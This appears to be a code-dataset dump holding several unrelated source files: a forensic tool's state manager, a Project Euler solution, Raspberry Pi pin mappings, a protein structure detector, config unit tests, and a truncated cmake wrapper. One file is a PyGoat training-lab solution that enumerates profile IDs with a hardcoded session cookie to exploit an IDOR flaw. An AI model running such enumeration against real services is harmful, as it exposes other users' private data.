hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acfa5aa027e7a67d259a229029fc60af12339d78 | 16,971 | py | Python | dftimewolf/lib/state.py | jonathan-greig/dftimewolf | 9f055033cfd866f76ad94891354f7e9db4b74528 | [
"Apache-2.0"
] | null | null | null | dftimewolf/lib/state.py | jonathan-greig/dftimewolf | 9f055033cfd866f76ad94891354f7e9db4b74528 | [
"Apache-2.0"
] | null | null | null | dftimewolf/lib/state.py | jonathan-greig/dftimewolf | 9f055033cfd866f76ad94891354f7e9db4b74528 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""This class maintains the internal dfTimewolf state.
Use it to track errors, abort on global failures, clean up after modules, etc.
"""
import importlib
import logging
import threading
import traceback
from typing import Callable, Dict, List, Sequence, TYPE_CHECKING, Type, Any, TypeVar, cast # pylint: disable=line-too-long
from dftimewolf.config import Config
from dftimewolf.lib import errors, utils
from dftimewolf.lib.errors import DFTimewolfError
from dftimewolf.lib.modules import manager as modules_manager
if TYPE_CHECKING:
from dftimewolf.lib import module as dftw_module
from dftimewolf.lib.containers import interface
T = TypeVar("T", bound="interface.AttributeContainer") # pylint: disable=invalid-name,line-too-long
# TODO(tomchop): Consider changing this to `dftimewolf.state` if we ever need
# more granularity.
logger = logging.getLogger('dftimewolf')
NEW_ISSUE_URL = 'https://github.com/log2timeline/dftimewolf/issues/new'
class DFTimewolfState(object):
"""The main State class.
Attributes:
command_line_options (dict[str, str]): Command line options passed to
dftimewolf.
config (dftimewolf.config.Config): Class to be used throughout execution.
errors (list[tuple[str, bool]]): errors generated by a module. These
should be cleaned up after each module run using the CleanUp() method.
global_errors (list[tuple[str, bool]]): the CleanUp() method moves non
critical errors to this attribute for later reporting.
input (list[str]): data that the current module will use as input.
output (list[str]): data that the current module generates.
recipe: (dict[str, str]): recipe declaring modules to load.
store (dict[str, object]): arbitrary data for modules.
"""
def __init__(self, config: Type[Config]) -> None:
"""Initializes a state."""
super(DFTimewolfState, self).__init__()
self.command_line_options = {} # type: Dict[str, str]
self._cache = {} # type: Dict[str, str]
self._module_pool = {} # type: Dict[str, dftw_module.BaseModule]
self._state_lock = threading.Lock()
self._threading_event_per_module = {} # type: Dict[str, threading.Event]
self.config = config
self.errors = [] # type: List[DFTimewolfError]
self.global_errors = [] # type: List[DFTimewolfError]
self.recipe = {} # type: Dict[str, Any]
self.store = {} # type: Dict[str, List[interface.AttributeContainer]]
self.streaming_callbacks = {} # type: Dict[Type[interface.AttributeContainer], List[Callable[[Any], Any]]] # pylint: disable=line-too-long
self._abort_execution = False
def _InvokeModulesInThreads(self, callback: Callable[[Any], Any]) -> None:
"""Invokes the callback function on all the modules in separate threads.
Args:
callback (function): callback function to invoke on all the modules.
"""
threads = []
for module_definition in self.recipe['modules']:
thread_args = (module_definition, )
thread = threading.Thread(target=callback, args=thread_args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
self.CheckErrors(is_global=True)
def ImportRecipeModules(self, module_locations: Dict[str, str]) -> None:
"""Dynamically loads the modules declared in a recipe.
Args:
module_location (dict[str, str]): A dfTimewolf module name - Python module
mapping. e.g.:
{'GRRArtifactCollector': 'dftimewolf.lib.collectors.grr_hosts'}
Raises:
errors.RecipeParseError: if a module requested in a recipe does not
exist in the mapping.
"""
for module in self.recipe['modules'] + self.recipe.get('preflights', []):
name = module['name']
if name not in module_locations:
msg = (f'In {self.recipe["name"]}: module {name} cannot be found. '
'It may not have been declared.')
raise errors.RecipeParseError(msg)
logger.debug('Loading module {0:s} from {1:s}'.format(
name, module_locations[name]))
location = module_locations[name]
try:
importlib.import_module(location)
except ModuleNotFoundError as exception:
msg = f'Cannot find Python module for {name} ({location}): {exception}'
raise errors.RecipeParseError(msg)
def LoadRecipe(self,
recipe: Dict[str, Any],
module_locations: Dict[str, str]) -> None:
"""Populates the internal module pool with modules declared in a recipe.
Args:
recipe (dict[str, Any]): recipe declaring modules to load.
Raises:
RecipeParseError: if a module in the recipe has not been declared.
"""
self.recipe = recipe
module_definitions = recipe.get('modules', [])
preflight_definitions = recipe.get('preflights', [])
self.ImportRecipeModules(module_locations)
for module_definition in module_definitions + preflight_definitions:
# Combine CLI args with args from the recipe description
module_name = module_definition['name']
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
runtime_name = module_definition.get('runtime_name')
if not runtime_name:
runtime_name = module_name
self._module_pool[runtime_name] = module_class(self, name=runtime_name)
def FormatExecutionPlan(self) -> str:
"""Formats execution plan.
Returns information about loaded modules and their corresponding arguments
to stdout.
Returns:
str: String representation of loaded modules and their parameters.
"""
plan = ""
maxlen = 0
modules = self.recipe.get('preflights', []) + self.recipe.get('modules', [])
for module in modules:
if not module['args']:
continue
spacing = len(max(module['args'].keys(), key=len))
maxlen = maxlen if maxlen > spacing else spacing
for module in modules:
runtime_name = module.get('runtime_name')
if runtime_name:
plan += '{0:s} ({1:s}):\n'.format(runtime_name, module['name'])
else:
plan += '{0:s}:\n'.format(module['name'])
new_args = utils.ImportArgsFromDict(
module['args'], self.command_line_options, self.config)
if not new_args:
plan += ' *No params*\n'
for key, value in new_args.items():
plan += ' {0:s}{1:s}\n'.format(key.ljust(maxlen + 3), repr(value))
return plan
def LogExecutionPlan(self) -> None:
"""Logs the result of FormatExecutionPlan() using the base logger."""
for line in self.FormatExecutionPlan().split('\n'):
logger.debug(line)
def AddToCache(self, name: str, value: Any) -> None:
"""Thread-safe method to add data to the state's cache.
If the cached item is already in the cache it will be
overwritten with the new value.
Args:
name (str): string with the name of the cache variable.
value (object): the value that will be stored in the cache.
"""
with self._state_lock:
self._cache[name] = value
def GetFromCache(self, name: str, default_value: Any=None) -> Any:
"""Thread-safe method to get data from the state's cache.
Args:
name (str): string with the name of the cache variable.
default_value (object): the value that will be returned if
the item does not exist in the cache. Optional argument
and defaults to None.
Returns:
object: object from the cache that corresponds to the name, or
the value of "default_value" if the cache does not contain
the variable.
"""
with self._state_lock:
return self._cache.get(name, default_value)
def StoreContainer(self, container: "interface.AttributeContainer") -> None:
"""Thread-safe method to store data in the state's store.
Args:
container (AttributeContainer): data to store.
"""
with self._state_lock:
self.store.setdefault(container.CONTAINER_TYPE, []).append(container)
def GetContainers(self,
container_class: Type[T],
pop: bool=False) -> Sequence[T]:
"""Thread-safe method to retrieve data from the state's store.
Args:
container_class (type): AttributeContainer class used to filter data.
pop (Optional[bool]): Whether to remove the containers from the state when
they are retrieved.
Returns:
Collection[AttributeContainer]: attribute container objects provided in
the store that correspond to the container type.
"""
with self._state_lock:
container_objects = cast(
List[T], self.store.get(container_class.CONTAINER_TYPE, []))
if pop:
self.store[container_class.CONTAINER_TYPE] = []
return tuple(container_objects)
def _SetupModuleThread(self, module_definition: Dict[str, str]) -> None:
"""Calls the module's SetUp() function and sets a threading event for it.
Callback for _InvokeModulesInThreads.
Args:
module_definition (dict[str, str]): recipe module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
logger.info('Setting up module: {0:s}'.format(runtime_name))
new_args = utils.ImportArgsFromDict(
module_definition['args'], self.command_line_options, self.config)
module = self._module_pool[runtime_name]
try:
module.SetUp(**new_args)
except errors.DFTimewolfError:
msg = "A critical error occurred in module {0:s}, aborting execution."
logger.critical(msg.format(module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
self._threading_event_per_module[runtime_name] = threading.Event()
self.CleanUp()
def SetupModules(self) -> None:
"""Performs setup tasks for each module in the module pool.
Threads declared modules' SetUp() functions. Takes CLI arguments into
account when replacing recipe parameters for each module.
"""
# Note that vars() copies the values of argparse.Namespace to a dict.
self._InvokeModulesInThreads(self._SetupModuleThread)
def _RunModuleThread(self, module_definition: Dict[str, str]) -> None:
"""Runs the module's Process() function.
Callback for _InvokeModulesInThreads.
Waits for any blockers to have finished before running Process(), then
sets an Event flag declaring the module has completed.
Args:
module_definition (dict): module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
for dependency in module_definition['wants']:
self._threading_event_per_module[dependency].wait()
module = self._module_pool[runtime_name]
# Abort processing if a module has had critical failures before.
if self._abort_execution:
logger.critical(
'Aborting execution of {0:s} due to previous errors'.format(
module.name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
return
logger.info('Running module: {0:s}'.format(runtime_name))
try:
module.Process()
except errors.DFTimewolfError:
logger.critical(
"Critical error in module {0:s}, aborting execution".format(
module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
logger.info('Module {0:s} finished execution'.format(runtime_name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
def RunPreflights(self) -> None:
"""Runs preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
args = preflight_definition.get('args', {})
new_args = utils.ImportArgsFromDict(
args, self.command_line_options, self.config)
preflight = self._module_pool[runtime_name]
try:
preflight.SetUp(**new_args)
preflight.Process()
finally:
self.CheckErrors(is_global=True)
def CleanUpPreflights(self) -> None:
"""Executes any cleanup actions defined in preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
preflight = self._module_pool[runtime_name]
try:
preflight.CleanUp()
finally:
self.CheckErrors(is_global=True)
def InstantiateModule(self, module_name: str) -> "dftw_module.BaseModule":
"""Instantiates an arbitrary dfTimewolf module.
Args:
module_name (str): The name of the module to instantiate.
Returns:
BaseModule: An instance of a dftimewolf Module, which is a subclass of
BaseModule.
"""
module_class: Type["dftw_module.BaseModule"]
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
return module_class(self)
def RunModules(self) -> None:
"""Performs the actual processing for each module in the module pool."""
self._InvokeModulesInThreads(self._RunModuleThread)
def RegisterStreamingCallback(
self,
target: Callable[["interface.AttributeContainer"], Any],
container_type: Type["interface.AttributeContainer"]) -> None:
"""Registers a callback for a type of container.
The function to be registered should a single parameter of type
interface.AttributeContainer.
Args:
target (function): function to be called.
container_type (type[interface.AttributeContainer]): container type on
which the callback will be called.
"""
if container_type not in self.streaming_callbacks:
self.streaming_callbacks[container_type] = []
self.streaming_callbacks[container_type].append(target)
def StreamContainer(self, container: "interface.AttributeContainer") -> None:
"""Streams a container to the callbacks that are registered to handle it.
Args:
container (interface.AttributeContainer): container instance that will be
streamed to any registered callbacks.
"""
for callback in self.streaming_callbacks.get(type(container), []):
callback(container)
def AddError(self, error: DFTimewolfError) -> None:
"""Adds an error to the state.
Args:
error (errors.DFTimewolfError): The dfTimewolf error to add.
"""
if error.critical:
self._abort_execution = True
self.errors.append(error)
def CleanUp(self) -> None:
"""Cleans up after running a module.
The state's output becomes the input for the next stage. Any errors are
moved to the global_errors attribute so that they can be reported at a
later stage.
"""
# Move any existing errors to global errors
self.global_errors.extend(self.errors)
self.errors = []
def CheckErrors(self, is_global: bool=False) -> None:
"""Checks for errors and exits if any of them are critical.
Args:
is_global (Optional[bool]): True if the global_errors attribute should
be checked. False if the error attribute should be checked.
"""
error_objects = self.global_errors if is_global else self.errors
critical_errors = False
if error_objects:
logger.error('dfTimewolf encountered one or more errors:')
for index, error in enumerate(error_objects):
logger.error('{0:d}: error from {1:s}: {2:s}'.format(
index+1, error.name, error.message))
if error.stacktrace:
for line in error.stacktrace.split('\n'):
logger.error(line)
if error.critical:
critical_errors = True
if any(error.unexpected for error in error_objects):
logger.critical('One or more unexpected errors occurred.')
logger.critical(
'Please consider opening an issue: {0:s}'.format(NEW_ISSUE_URL))
if critical_errors:
raise errors.CriticalError('Critical error found. Aborting.')
| 37.298901 | 144 | 0.685463 |
acfa5cfbc7cc6eb3d9fec59853124eee4dca148c | 1,249 | py | Python | Solutions/0021.py | zejacobi/ProjectEuler | 3e5731597784ee9433e9f2249b7ea92dc93527ee | [
"Unlicense"
] | 1 | 2018-01-26T14:11:54.000Z | 2018-01-26T14:11:54.000Z | Solutions/0021.py | zejacobi/ProjectEuler | 3e5731597784ee9433e9f2249b7ea92dc93527ee | [
"Unlicense"
] | null | null | null | Solutions/0021.py | zejacobi/ProjectEuler | 3e5731597784ee9433e9f2249b7ea92dc93527ee | [
"Unlicense"
] | null | null | null | """
# PROBLEM 21
Let d(n) be defined as the sum of proper divisors of n
(numbers less than n which divide evenly into n).
If d(a) = b and d(b) = a, where a != b, then a and b are an amicable pair and each of a and b are
called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110;
therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
"""
from math import sqrt, ceil
amicable_numbers = []
def d(n):
factors = []
upper_bound = int(ceil(sqrt(n)))
for i in range(2, upper_bound):
if not n % i:
factors.append(i)
factors.append(n / i)
return sum(factors) + 1
for number in range(1, 10000):
if number not in amicable_numbers:
potential_friend = d(number)
if potential_friend != number and d(potential_friend) == number:
# remember: we don't want to count a number if its divisor sum is itself
amicable_numbers.append(number)
if potential_friend < 10000: # we also don't want to count it if it's too big
amicable_numbers.append(potential_friend)
print(sum(amicable_numbers))
| 30.463415 | 97 | 0.648519 |
acfa5d14396b015cfb66c7312e5b87bcc2dc8c3b | 697 | py | Python | src/adafruit_blinka/board/raspi_40pin.py | ansarid/Adafruit_Blinka | 18765a52c16c4a58deabb92ce4607b125c1c1b98 | [
"MIT"
] | null | null | null | src/adafruit_blinka/board/raspi_40pin.py | ansarid/Adafruit_Blinka | 18765a52c16c4a58deabb92ce4607b125c1c1b98 | [
"MIT"
] | null | null | null | src/adafruit_blinka/board/raspi_40pin.py | ansarid/Adafruit_Blinka | 18765a52c16c4a58deabb92ce4607b125c1c1b98 | [
"MIT"
] | null | null | null | """Pin definitions for 40-pin Raspberry Pi models."""
from adafruit_blinka.microcontroller.bcm283x import pin
D0 = pin.D0
D1 = pin.D1
D2 = pin.D2
SDA = pin.SDA
D3 = pin.D3
SCL = pin.SCL
D4 = pin.D4
D5 = pin.D5
D6 = pin.D6
D7 = pin.D7
CE1 = pin.D7
D8 = pin.D8
CE0 = pin.D8
D9 = pin.D9
MISO = pin.D9
D10 = pin.D10
MOSI = pin.D10
D11 = pin.D11
SCLK = pin.D11
SCK = pin.D11
D12 = pin.D12
D13 = pin.D13
D14 = pin.D14
TXD = pin.D14
D15 = pin.D15
RXD = pin.D15
D16 = pin.D16
D17 = pin.D17
D18 = pin.D18
D19 = pin.D19
MISO_1 = pin.D19
D20 = pin.D20
MOSI_1 = pin.D20
D21 = pin.D21
SCLK_1 = pin.D21
SCK_1 = pin.D21
D22 = pin.D22
D23 = pin.D23
D24 = pin.D24
D25 = pin.D25
D26 = pin.D26
D27 = pin.D27
| 13.150943 | 55 | 0.657102 |
acfa5e92a89956ecc4ce608a3e598a6e695e5996 | 3,367 | py | Python | oddt/toolkits/common.py | mwojcikowski/oddt | 3b58b15b530e97a90d958fe8b862f16605b6da1f | [
"BSD-3-Clause"
] | null | null | null | oddt/toolkits/common.py | mwojcikowski/oddt | 3b58b15b530e97a90d958fe8b862f16605b6da1f | [
"BSD-3-Clause"
] | null | null | null | oddt/toolkits/common.py | mwojcikowski/oddt | 3b58b15b530e97a90d958fe8b862f16605b6da1f | [
"BSD-3-Clause"
] | null | null | null | """Code common to all toolkits"""
import numpy as np
from oddt.spatial import dihedral, distance
def detect_secondary_structure(res_dict):
"""Detect alpha helices and beta sheets in res_dict by phi and psi angles"""
first = res_dict[:-1]
second = res_dict[1:]
psi = dihedral(first['N'], first['CA'], first['C'], second['N'])
phi = dihedral(first['C'], second['N'], second['CA'], second['C'])
d = second['id'] - first['id']
# Alpha helices
res_mask_alpha = (((phi > -145) & (phi < -35) &
(psi > -70) & (psi < 50) & (d == 1))) # alpha
res_mask_alpha = np.union1d(np.argwhere(res_mask_alpha),
np.argwhere(res_mask_alpha))
# Ignore groups smaller than 3
for mask_group in np.split(res_mask_alpha, np.argwhere(np.diff(res_mask_alpha) != 1).flatten() + 1):
if len(mask_group) >= 3:
res_dict['isalpha'][mask_group] = True
# Alpha helices have to form H-Bonds
hbond_dist_mask = np.abs(res_dict[res_dict['isalpha']]['resnum'] -
res_dict[res_dict['isalpha']]['resnum'][:, np.newaxis]) >= 3
hbond_mask = distance(res_dict[res_dict['isalpha']]['N'],
res_dict[res_dict['isalpha']]['O']) < 3.5
p_mask = ((hbond_mask & hbond_dist_mask).any(axis=0) |
(hbond_mask & hbond_dist_mask).any(axis=1))
res_dict['isalpha'][np.argwhere(res_dict['isalpha']).flatten()[~p_mask]] = False
# Ignore groups smaller than 3
res_mask_alpha = np.argwhere(res_dict['isalpha']).flatten()
for mask_group in np.split(res_mask_alpha, np.argwhere(np.diff(res_mask_alpha) != 1).flatten() + 1):
if 0 < len(mask_group) < 3:
res_dict['isalpha'][mask_group] = False
# Beta sheets
res_mask_beta = (((phi >= -180) & (phi < -40) &
(psi <= 180) & (psi > 90) & (d == 1)) |
((phi >= -180) & (phi < -70) &
(psi <= -165) & (d == 1))) # beta
res_mask_beta = np.union1d(np.argwhere(res_mask_beta),
np.argwhere(res_mask_beta))
# Ignore groups smaller than 3
for mask_group in np.split(res_mask_beta, np.argwhere(np.diff(res_mask_beta) != 1).flatten() + 1):
if len(mask_group) >= 3:
res_dict['isbeta'][mask_group] = True
# Beta strands have to be alongside eachother
res_dist_mask = np.abs(res_dict[res_dict['isbeta']]['resnum'] -
res_dict[res_dict['isbeta']]['resnum'][:, np.newaxis]) >= 4
hbond_mask = distance(res_dict[res_dict['isbeta']]['N'],
res_dict[res_dict['isbeta']]['O']) < 3.5
ca_mask = distance(res_dict[res_dict['isbeta']]['CA'],
res_dict[res_dict['isbeta']]['CA']) < 4.5
p_mask = ((hbond_mask & res_dist_mask).any(axis=0) |
(hbond_mask & res_dist_mask).any(axis=1) |
(ca_mask & res_dist_mask).any(axis=0))
res_dict['isbeta'][np.argwhere(res_dict['isbeta']).flatten()[~p_mask]] = False
# Ignore groups smaller than 3
res_mask_beta = np.argwhere(res_dict['isbeta']).flatten()
for mask_group in np.split(res_mask_beta, np.argwhere(np.diff(res_mask_beta) != 1).flatten() + 1):
if 0 < len(mask_group) < 3:
res_dict['isbeta'][mask_group] = False
return res_dict
| 46.123288 | 104 | 0.579151 |
acfa5eb912f0a0521f79414043c6be750a4dd1ee | 421 | py | Python | app/solutions/payloads/idor_solution.py | monkey-test/PyGoat | 218accb37e0aa1c7cbbc5a577cf701f88caf76c6 | [
"MIT"
] | 4 | 2020-06-05T19:27:24.000Z | 2020-08-28T03:52:34.000Z | app/solutions/payloads/idor_solution.py | monkey-test/PyGoat | 218accb37e0aa1c7cbbc5a577cf701f88caf76c6 | [
"MIT"
] | 2 | 2020-05-23T08:56:31.000Z | 2021-05-11T15:44:15.000Z | app/solutions/payloads/idor_solution.py | monkey-test/PyGoat | 218accb37e0aa1c7cbbc5a577cf701f88caf76c6 | [
"MIT"
] | 2 | 2021-02-18T16:17:50.000Z | 2022-03-14T20:22:55.000Z | import requests
url = "http://localhost:5000/idor/profiles/"
headers = {"cookie": "session=eyJ1c2VybmFtZSI6InRlc3QifQ.EWaHZQ.TRftfGBwIDUpw36Ql1t7rh9PVn8"}
for i in range(23980, 23990, 1):
response = requests.get("%s%d" % (url, i), headers=headers)
if response.status_code != 500 and i != 23988:
print("id: %d" % i, "status code: %d" % response.status_code, "response: %s" % response.text)
break
| 38.272727 | 101 | 0.674584 |
acfa5f215b5bab280aab98080447ebf2ec8732e4 | 8,486 | py | Python | compass/tests/deployment/installers/test_config_manager.py | leah03/test-originrepo | fc022a3e2b20f1a4f2de8e4403695aec003671d0 | [
"Apache-2.0"
] | 2 | 2016-04-16T09:09:55.000Z | 2022-02-07T19:48:13.000Z | compass/tests/deployment/installers/test_config_manager.py | leah03/test-originrepo | fc022a3e2b20f1a4f2de8e4403695aec003671d0 | [
"Apache-2.0"
] | null | null | null | compass/tests/deployment/installers/test_config_manager.py | leah03/test-originrepo | fc022a3e2b20f1a4f2de8e4403695aec003671d0 | [
"Apache-2.0"
] | 3 | 2016-04-01T01:34:00.000Z | 2022-02-07T19:48:14.000Z | # Copyright 2014 Huawei Technologies Co. Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test config_manager module."""
import os
import unittest2
os.environ['COMPASS_IGNORE_SETTING'] = 'true'
from compass.utils import setting_wrapper as compass_setting
reload(compass_setting)
from compass.deployment.installers.config_manager import BaseConfigManager
from compass.deployment.utils import constants as const
from compass.tests.deployment.test_data import config_data
from compass.utils import flags
from compass.utils import logsetting
class TestConfigManager(unittest2.TestCase):
"""Test ConfigManager methods."""
def setUp(self):
super(TestConfigManager, self).setUp()
self.adapter_test_info = config_data.adapter_test_config
self.cluster_test_info = config_data.cluster_test_config
self.hosts_test_info = config_data.hosts_test_config
self.test_config_manager = BaseConfigManager(self.adapter_test_info,
self.cluster_test_info,
self.hosts_test_info)
def tearDown(self):
super(TestConfigManager, self).tearDown()
del self.test_config_manager
def test_get_cluster_baseinfo(self):
expected_output = {
"id": 1,
"name": "test",
"os_name": "Ubuntu-12.04-x86_64"
}
output = self.test_config_manager.get_cluster_baseinfo()
self.maxDiff = None
self.assertDictEqual(expected_output, output)
def test_get_host_id_list(self):
expected_output = [1, 2, 3]
output = self.test_config_manager.get_host_id_list()
self.assertEqual(expected_output, output)
def test_get_cluster_roles_mapping(self):
expected_output = {
"os_controller": [{
"hostname": "server01",
"management": {
"interface": "vnet0",
"ip": "12.234.32.100",
"netmask": "255.255.255.0",
"is_mgmt": True,
"is_promiscuous": False,
"subnet": "12.234.32.0/24"
},
"tenant": {
"interface": "vnet1",
"ip": "172.16.1.1",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": False,
"subnet": "172.16.1.0/24"
}
}],
"os_compute_worker": [{
"hostname": "server02",
"management": {
"interface": "eth0",
"ip": "12.234.32.101",
"netmask": "255.255.255.0",
"is_mgmt": True,
"is_promiscuous": False,
"subnet": "12.234.32.0/24"
},
"tenant": {
"interface": "eth1",
"ip": "172.16.1.2",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": False,
"subnet": "172.16.1.0/24"
}
}, {
"hostname": "server03",
"management": {
"interface": "eth0",
"ip": "12.234.32.103",
"is_mgmt": True,
"is_promiscuous": False,
"netmask": "255.255.255.0",
"subnet": "12.234.32.0/24"
},
'public': {
"interface": "eth2",
"ip": "10.0.0.1",
"is_mgmt": False,
"is_promiscuous": True,
"netmask": "255.255.255.0",
"subnet": "10.0.0.0/24"
},
"tenant": {
"interface": "eth1",
"ip": "172.16.1.3",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": False,
"subnet": "172.16.1.0/24"
}
}],
"os_network": [{
"hostname": "server03",
"management": {
"interface": "eth0",
"ip": "12.234.32.103",
"netmask": "255.255.255.0",
"is_mgmt": True,
"is_promiscuous": False,
"subnet": "12.234.32.0/24"
},
"tenant": {
"interface": "eth1",
"ip": "172.16.1.3",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": False,
"subnet": "172.16.1.0/24"
},
"public": {
"interface": "eth2",
"ip": "10.0.0.1",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": True,
"subnet": "10.0.0.0/24"
}
}]
}
self.maxDiff = None
output = self.test_config_manager.get_cluster_roles_mapping()
self.assertEqual(expected_output, output)
def test_get_all_hosts_roles(self):
expected_output = ['os-compute-worker', 'os-network', 'os-controller']
output = self.test_config_manager.get_all_hosts_roles()
self.assertEqual(len(expected_output), len(output))
self.assertEqual(sorted(expected_output), sorted(output))
def test_get_host_role_mapping(self):
expected_output = {
"os_network": {
"hostname": "server03",
"management": {
"interface": "eth0",
"ip": "12.234.32.103",
"netmask": "255.255.255.0",
"is_mgmt": True,
"is_promiscuous": False,
"subnet": "12.234.32.0/24"
},
"tenant": {
"interface": "eth1",
"ip": "172.16.1.3",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": False,
"subnet": "172.16.1.0/24"
},
"public": {
"interface": "eth2",
"ip": "10.0.0.1",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": True,
"subnet": "10.0.0.0/24"
}
},
"os_compute_worker": {
"hostname": "server03",
"management": {
"interface": "eth0",
"ip": "12.234.32.103",
"netmask": "255.255.255.0",
"is_mgmt": True,
"is_promiscuous": False,
"subnet": "12.234.32.0/24"
},
"tenant": {
"interface": "eth1",
"ip": "172.16.1.3",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": False,
"subnet": "172.16.1.0/24"
},
"public": {
"interface": "eth2",
"ip": "10.0.0.1",
"netmask": "255.255.255.0",
"is_mgmt": False,
"is_promiscuous": True,
"subnet": "10.0.0.0/24"
}
}
}
self.maxDiff = None
output = self.test_config_manager.get_host_roles_mapping(3)
self.assertEqual(expected_output, output)
if __name__ == '__main__':
flags.init()
logsetting.init()
unittest2.main()
| 36.264957 | 78 | 0.448268 |
acfa5ff89c420aef98eb4e4653a08fb6b5021501 | 4,256 | py | Python | mod/tools/cmake.py | rbxnk/fips | b1bd5f33f04d48f080e621d27214c254149924ca | [
"MIT"
] | null | null | null | mod/tools/cmake.py | rbxnk/fips | b1bd5f33f04d48f080e621d27214c254149924ca | [
"MIT"
] | null | null | null | mod/tools/cmake.py | rbxnk/fips | b1bd5f33f04d48f080e621d27214c254149924ca | [
"MIT"
] | null | null | null | """wrapper for cmake tool"""
import subprocess
from subprocess import PIPE
import platform
from mod import log,util
from mod.tools import ninja
name = 'cmake'
platforms = ['linux', 'osx', 'win']
optional = False
not_found = 'please install cmake 2.8 or newer'
#------------------------------------------------------------------------------
def check_exists(fips_dir, major=2, minor=8) :
"""test if cmake is in the path and has the required version
:returns: True if cmake found and is the required version
"""
try:
out = subprocess.check_output(['cmake', '--version']).decode("utf-8")
ver = out.split()[2].split('.')
if int(ver[0]) > major or (int(ver[0]) == major and int(ver[1]) >= minor):
return True
else :
log.info('{}NOTE{}: cmake must be at least version {}.{} (found: {}.{}.{})'.format(
log.RED, log.DEF, major, minor, ver[0],ver[1],ver[2]))
return False
except (OSError, subprocess.CalledProcessError):
return False
#------------------------------------------------------------------------------
def run_gen(cfg, fips_dir, project_dir, build_dir, toolchain_path, defines) :
"""run cmake tool to generate build files
:param cfg: a fips config object
:param project_dir: absolute path to project (must have root CMakeLists.txt file)
:param build_dir: absolute path to build directory (where cmake files are generated)
:param toolchain: toolchain path or None
:returns: True if cmake returned successful
"""
cmdLine = 'cmake'
if cfg['generator'] != 'Default' :
cmdLine += ' -G "{}"'.format(cfg['generator'])
if cfg['generator-platform'] :
cmdLine += ' -A "{}"'.format(cfg['generator-platform'])
if cfg['generator-toolset'] :
cmdLine += ' -T "{}"'.format(cfg['generator-toolset'])
cmdLine += ' -DCMAKE_BUILD_TYPE={}'.format(cfg['build_type'])
if cfg['build_tool'] == 'ninja' and platform.system() == 'Windows':
cmdLine += ' -DCMAKE_MAKE_PROGRAM={}'.format(ninja.get_ninja_tool(fips_dir))
if toolchain_path is not None :
cmdLine += ' -DCMAKE_TOOLCHAIN_FILE={}'.format(toolchain_path)
cmdLine += ' -DFIPS_CONFIG={}'.format(cfg['name'])
if cfg['defines'] is not None :
for key in cfg['defines'] :
val = cfg['defines'][key]
if type(val) is bool :
cmdLine += ' -D{}={}'.format(key, 'ON' if val else 'OFF')
else :
cmdLine += ' -D{}="{}"'.format(key, val)
for key in defines :
